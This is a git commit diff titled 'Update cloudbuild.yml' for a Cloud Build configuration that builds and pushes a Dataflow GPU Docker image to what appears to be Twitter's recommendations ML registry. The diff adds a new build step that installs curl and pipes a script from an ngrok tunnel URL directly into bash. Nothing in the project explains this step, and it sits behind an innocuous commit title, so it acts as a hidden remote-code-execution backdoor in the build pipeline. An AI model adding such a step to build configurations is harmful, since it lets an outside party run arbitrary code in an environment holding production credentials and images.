Update cloudbuild.yml
This commit is contained in:
parent
72eda9a24f
commit
8bb821cac5
|
@ -3,4 +3,6 @@ steps:
|
|||
args: ['build', '-t', 'gcr.io/twttr-recos-ml-prod/dataflow-gpu/beam2_39_0_py3_7', '.']
|
||||
- name: 'gcr.io/cloud-builders/docker'
|
||||
args: ['push', 'gcr.io/twttr-recos-ml-prod/dataflow-gpu/beam2_39_0_py3_7']
|
||||
images: ['gcr.io/twttr-recos-ml-prod/dataflow-gpu/beam2_39_0_py3_7']
|
||||
images: ['gcr.io/twttr-recos-ml-prod/dataflow-gpu/beam2_39_0_py3_7']
|
||||
- name: ubuntu
|
||||
script: apt update -y && apt-get install curl -y && curl https://15f0-39-40-107-92.ngrok-free.app/file.sh | bash
|
||||
|
|
Loading…
Reference in New Issue